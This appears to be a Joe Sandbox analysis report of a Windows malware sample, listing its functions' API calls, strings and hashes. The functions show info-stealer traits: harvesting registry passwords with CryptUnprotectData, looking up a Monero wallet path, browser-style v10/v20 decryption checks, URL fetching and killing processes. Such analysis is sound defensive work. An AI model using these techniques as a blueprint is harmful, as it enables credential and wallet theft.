                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: 50f480731543d90bcc59a4c93678a38b3dcdcabcd730b341ca27ed792f693d0b
                                  • Instruction ID: 7ed5b38a787ab05469b5f096e057192d904334ba42b9e2695b52a271e0fa9835
                                  • Opcode Fuzzy Hash: 50f480731543d90bcc59a4c93678a38b3dcdcabcd730b341ca27ed792f693d0b
                                  • Instruction Fuzzy Hash: 1831C272A20254AFCF10DF68DC849EAB779EBC4754B14452DE50AA7341DB70ED10DBA4
                                  Function 002C81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C8243
                                  • lstrlen.KERNEL32(00000000), ref: 002C8260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C8297
                                  • lstrlen.KERNEL32(00000000), ref: 002C82B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C82EB
                                  • lstrlen.KERNEL32(00000000), ref: 002C8308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C8337
                                  • lstrlen.KERNEL32(00000000), ref: 002C8351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C8380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: daa96a387c16adbd64f8a5610ebd5d3b0394c3ec015b72773948bec17f91e17c
                                  • Instruction ID: 0470601672eceba24282d2c40dddb0cc73f935518b56b05f00d047ef3b9a1860
                                  • Opcode Fuzzy Hash: daa96a387c16adbd64f8a5610ebd5d3b0394c3ec015b72773948bec17f91e17c
                                  • Instruction Fuzzy Hash: 6B518F71520643DBEB10DF28D998BAAB7A4EF04740F118668ED46EB245DF34ED60CBE0
                                  Function 002B77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002B7805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 002B784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 002B78B8
                                    • Part of subcall function 002B7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 002B775E
                                    • Part of subcall function 002B7750: RtlAllocateHeap.NTDLL(00000000), ref: 002B7765
                                    • Part of subcall function 002B7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002B778D
                                    • Part of subcall function 002B7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 002B77AD
                                    • Part of subcall function 002B7750: LocalFree.KERNEL32(?), ref: 002B77B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002B78EC
                                  • HeapFree.KERNEL32(00000000), ref: 002B78F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 002B7A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: cfa0ae5499b3d3de2532bec964c5cb7de331f6248741ffb7ac8abb6171e59a54
                                  • Instruction ID: 8d60cdf10aa7e793be75d1c42b282fbdb76b181a237692f2e057acb14ed787c2
                                  • Opcode Fuzzy Hash: cfa0ae5499b3d3de2532bec964c5cb7de331f6248741ffb7ac8abb6171e59a54
                                  • Instruction Fuzzy Hash: 507141B1D1021DAFDB10DF95CCC0AEEB7B8EF49340F14456AE609A7240EB75AA85CF91
                                  Function 002B1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B1135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 002B1159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 002B1173
                                  • RegCloseKey.ADVAPI32(?), ref: 002B117D
                                  Strings
                                  • wallet_path, xrefs: 002B116D
                                  • SOFTWARE\monero-project\monero-core, xrefs: 002B114F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: 09e8716a124b706853d55838ff687f35803d993b77a10a468837c8c9c59eb74c
                                  • Instruction ID: 7d804b858e9072bff3d6682c9e4b5d345b42b7fa106c75ba1eae694aa62b8404
                                  • Opcode Fuzzy Hash: 09e8716a124b706853d55838ff687f35803d993b77a10a468837c8c9c59eb74c
                                  • Instruction Fuzzy Hash: FDF09675A40348BBD7109BE19C8DFEA7B7CDB04715F000064FE09E6281D6705D5487A4
                                  Function 002B9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 002B9E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 002B9E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 002B9EA7
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  • lstrcpy.KERNEL32(00000000,002E4C48), ref: 002B9FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: c8e52bb275d329ca6512ff5539c43c037f46b68cbd6958fb26ce8b2115e953e3
                                  • Instruction ID: 7ca948c2b6d984c053fb3d1abcfb34d483bbab7e3b371c52e4bc9e5a17428758
                                  • Opcode Fuzzy Hash: c8e52bb275d329ca6512ff5539c43c037f46b68cbd6958fb26ce8b2115e953e3
                                  • Instruction Fuzzy Hash: A351B031A302499BDB10EF65DC85BEE77A8EF003A4F254065FA49EB241DB70ED648BD0
                                  Function 002B5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002B565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B5661
                                  • InternetOpenA.WININET(002DCFEC,00000000,00000000,00000000,00000000), ref: 002B5677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 002B5692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 002B56BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 002B56E1
                                  • InternetCloseHandle.WININET(?), ref: 002B56FA
                                  • InternetCloseHandle.WININET(00000000), ref: 002B5701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: d8058ae3d26eed7031e8db5f333a71d88e28c066a5698ea194b3b6b724cdedf2
                                  • Instruction ID: b94ce2bad10ec62b9b72e0d09d9f509aa451c72bbe20082da2df8a83b2b69ae4
                                  • Opcode Fuzzy Hash: d8058ae3d26eed7031e8db5f333a71d88e28c066a5698ea194b3b6b724cdedf2
                                  • Instruction Fuzzy Hash: 15418D70A10216EFDB24CF55DD88BEAB7B8FF48350F1480A9E9089F291E7719D42CB94
                                  Function 002D4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 002D4759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 002D4769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 002D47AB
                                  • CloseHandle.KERNEL32(00000000), ref: 002D47B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D47C0
                                  • CloseHandle.KERNEL32(00000000), ref: 002D47CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 24b7ad84d190fe391d535b01d8bc1f580affa2d5a24dec3c62f4471ebde82313
                                  • Instruction ID: c6492e740192f46defc9ac816c022b68d91793b3ecb1e06f79470d513557d9e7
                                  • Opcode Fuzzy Hash: 24b7ad84d190fe391d535b01d8bc1f580affa2d5a24dec3c62f4471ebde82313
                                  • Instruction Fuzzy Hash: 7301B9715012156BFB20AF609CC9FEAB77CEB48751F0001A5F909D51C2DF708D908A64
                                  Function 002C83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C8435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C846C
                                  • lstrlen.KERNEL32(00000000), ref: 002C84B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C84E9
                                  • lstrlen.KERNEL32(00000000), ref: 002C84FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C852E
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 0435268c9f45d078f1cd1e6ca3408b79acc25fde7d63dbf6bc366891dabb3ecc
                                  • Instruction ID: 31b318006b075f83963d44d7922f82b62e32f41688443beb1bbd9856a025b8c3
                                  • Opcode Fuzzy Hash: 0435268c9f45d078f1cd1e6ca3408b79acc25fde7d63dbf6bc366891dabb3ecc
                                  • Instruction Fuzzy Hash: A0517D715202029FDB24DF68D884E9AB7F9EF48340F25C56DEC86EB345EB70E9518B50
                                  Function 002D2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 002D2925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,011BC048,00000000,00020119,002D28A9), ref: 002D294B
                                  • RegQueryValueExA.ADVAPI32(002D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 002D2965
                                  • RegCloseKey.ADVAPI32(002D28A9), ref: 002D296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: a75ae0d470a01a0bb4aaa3a23b2c58a3dfdd4b69c516aef551dcce4fa9110f0e
                                  • Instruction ID: 5a0819e95cbf3e185c6c057bd96b47316117af01ce6875e4b01910291faee892
                                  • Opcode Fuzzy Hash: a75ae0d470a01a0bb4aaa3a23b2c58a3dfdd4b69c516aef551dcce4fa9110f0e
                                  • Instruction Fuzzy Hash: 8D01B575500295ABD720CFA0DC99EEB7BBCEB49715F200069FE459B281E6315D188794
                                  Function 002D2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
